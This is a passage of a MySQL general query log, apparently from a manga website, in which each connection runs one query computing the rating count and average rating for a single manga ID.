total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330654241 Quit 330654242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330654242 Quit 330654243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330654243 Quit 330654244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330654244 Quit 330654245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330654245 Quit 330654246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330654246 Quit 330654247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330654247 Quit 330654248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330654248 Quit 330654249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330654249 Quit 330654250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330654250 Quit 330654251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330654251 Quit 330654252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330654252 Quit 330654253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330654253 Quit 330654254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330654254 Quit 330654255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330654255 Quit 330654256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330654256 Quit 330654257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330654257 Quit 330654258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330654258 Quit 330654259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330654259 Quit 330654260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330654260 Quit 330654261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330654261 Quit 330654262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330654262 Quit 330654263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330654263 Quit 330654264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330654264 Quit 330654265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330654265 Quit 330654266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330654266 Quit 330654267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330654267 Quit 330654268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330654268 Quit 330654269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330654269 Quit 330654270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330654270 Quit 330654271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330654271 Quit 330654272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330654272 Quit 330654273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330654273 Quit 330654274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330654274 Quit 330654275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330654275 Quit 330654276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330654276 Quit 330654277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330654277 Quit 330654278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330654278 Quit 330654279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330654279 Quit 330654280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330654280 Quit 330654281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330654281 Quit 330654282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330654282 Quit 330654283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330654283 Quit 330654284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330654284 Quit 330654285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330654285 Quit 330654286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330654286 Quit 330654287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330654287 Quit 330654288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330654288 Quit 330654289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330654289 Quit 330654290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330654290 Quit 330654291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330654291 Quit 330654292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330654292 Quit 330654293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330654293 Quit 330654294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330654294 Quit 330654295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330654295 Quit 330654296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330654296 Quit 330654297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330654297 Quit 330654298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330654298 Quit 330654299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330654299 Quit 330654300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330654300 Quit 330654301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330654301 Quit 330654302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330654302 Quit 330654303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330654303 Quit 330654304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330654304 Quit 330654305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330654305 Quit 330654306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330654306 Quit 330654307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330654307 Quit 330654308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330654308 Quit 330654309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330654309 Quit 330654310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330654310 Quit 330654311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330654311 Quit 330654312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330654312 Quit 330654313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330654313 Quit 330654314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330654314 Quit 330654315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330654315 Quit 330654316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330654316 Quit 330654317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330654317 Quit 330654318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330654318 Quit 330654319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330654319 Quit 330654320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330654320 Quit 330654321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330654321 Quit 330654322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330654322 Quit 330654323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330654323 Quit 330654324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330654324 Quit 330654325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330654325 Quit 330654326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330654326 Quit 330654327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330654327 Quit 330654328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330654328 Quit 330654329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330654329 Quit 330654330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330654330 Quit 330654331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330654331 Quit 330654332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330654332 Quit 330654333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330654333 Quit 330654334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330654334 Quit 330654335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330654335 Quit 330654336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330654336 Quit 330654337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330654337 Quit 330654338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330654338 Quit 330654339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330654339 Quit 330654340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330654340 Quit 330654341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330654341 Quit 330654342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330654342 Quit 330654343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330654343 Quit 330654344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330654344 Quit 330654345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330654345 Quit 330654346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330654346 Quit 330654347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330654347 Quit 330654348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330654348 Quit 330654349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330654349 Quit 330654350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330654350 Quit 330654351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330654351 Quit 330654352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330654352 Quit 330654353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330654353 Quit 330654354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330654354 Quit 330654355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330654355 Quit 330654356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330654356 Quit 330654357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330654357 Quit 330654358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330654358 Quit 330654359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330654359 Quit 330654360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330654360 Quit 330654361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330654361 Quit 330654362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330654362 Quit 330654363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330654363 Quit 330654364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330654364 Quit 330654365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330654365 Quit 330654366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330654366 Quit 330654367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330654367 Quit 330654368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330654368 Quit 330654369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330654369 Quit 330654370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330654370 Quit 330654371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330654371 Quit 330654372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330654372 Quit 330654373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330654373 Quit 330654374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330654374 Quit 330654375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330654375 Quit 330654376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330654376 Quit 330654377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330654377 Quit 330654378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330654378 Quit 330654379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330654379 Quit 330654380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330654380 Quit 330654381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330654381 Quit 330654382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330654382 Quit 330654383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330654383 Quit 330654384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330654384 Quit 330654385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330654385 Quit 330654386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330654386 Quit 330654387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330654387 Quit 330654388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330654388 Quit 330654389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330654389 Quit 330654390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330654390 Quit 330654391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330654391 Quit 330654392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330654392 Quit 330654393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330654393 Quit 330654394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654394 Query select count(id) as total_rating, 